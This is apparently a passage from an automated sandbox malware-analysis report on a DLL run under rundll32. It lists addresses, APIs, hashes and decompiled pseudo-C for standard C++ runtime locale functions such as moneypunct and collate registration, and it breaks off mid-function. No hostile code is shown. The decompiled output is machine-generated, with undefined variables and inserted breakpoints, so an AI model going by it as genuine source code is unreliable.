                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F614
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F61E
                          • int.LIBCPMT ref: 6E20F635
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F658
                          • std::_Facet_Register.LIBCPMT ref: 6E20F66F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F68F
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F6AD
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
                          • Instruction ID: 9f029279f3dec20ff8cca31f8de851de466ce8a13851c521c966489a781f5d2a
                          • Opcode Fuzzy Hash: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
                          • Instruction Fuzzy Hash: 24110675D0051E8FCF04DBE0C894AEEB77BAF44B18F240918E420AB2D0DB749A45CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B74C, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E21BF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E21BFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E21C050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E21C0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E21C120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E21C1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E21C229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21C295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21D028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}






























                          0x6e21b74c
                          0x6e21b74c
                          0x6e21b753
                          0x6e21b75d
                          0x6e21b762
                          0x6e21b76d
                          0x6e21b771
                          0x6e21b774
                          0x6e21b779
                          0x6e21b77d
                          0x6e21b782
                          0x6e21b786
                          0x6e21b7cb
                          0x6e21b7ce
                          0x6e21b7da
                          0x6e21b788
                          0x6e21b78a
                          0x6e21b790
                          0x6e21b796
                          0x6e21b79e
                          0x6e21b7a1
                          0x6e21b7de
                          0x6e21b7ec
                          0x6e21b7f1
                          0x6e21b7f9
                          0x6e21b803
                          0x6e21b808
                          0x6e21b813
                          0x6e21b817
                          0x6e21b81a
                          0x6e21b81f
                          0x6e21b828
                          0x6e21b82a
                          0x6e21b82c
                          0x6e21b871
                          0x6e21b874
                          0x6e21b880
                          0x6e21b82e
                          0x6e21b82e
                          0x6e21b830
                          0x6e21b836
                          0x6e21b83c
                          0x6e21b844
                          0x6e21b847
                          0x6e21b884
                          0x6e21b892
                          0x6e21b897
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8ce
                          0x6e21b8d0
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6
                          0x6e21b849
                          0x6e21b849
                          0x6e21b84c
                          0x6e21b850
                          0x6e21b854
                          0x6e21b861
                          0x6e21b869
                          0x6e21b86b
                          0x00000000
                          0x6e21b86b
                          0x6e21b832
                          0x6e21b832
                          0x00000000
                          0x6e21b832
                          0x6e21b830
                          0x6e21b7a3
                          0x6e21b7a3
                          0x6e21b7a6
                          0x6e21b7aa
                          0x6e21b7ae
                          0x6e21b7bb
                          0x6e21b7c3
                          0x6e21b7c5
                          0x00000000
                          0x6e21b7c5
                          0x6e21b78c
                          0x6e21b78c
                          0x00000000
                          0x6e21b78c
                          0x6e21b78a

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B753
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B75D
                          • int.LIBCPMT ref: 6E21B774
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E21B797
                          • std::_Facet_Register.LIBCPMT ref: 6E21B7AE
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B7CE
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B7EC
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID:
                          • API String ID: 2363045490-0
                          • Opcode ID: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
                          • Instruction ID: 7624d2fd8d0dbc0651cbef8b4529f7c1278a29cac0ae02a43c025bbc50aa34c0
                          • Opcode Fuzzy Hash: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
                          • Instruction Fuzzy Hash: 8311E77A91461ECBCF00DBE0C894EFDB7BBAF44B14F140909E510AB390DBB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B7F2, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E21BFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E21C050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E21C0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E21C120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
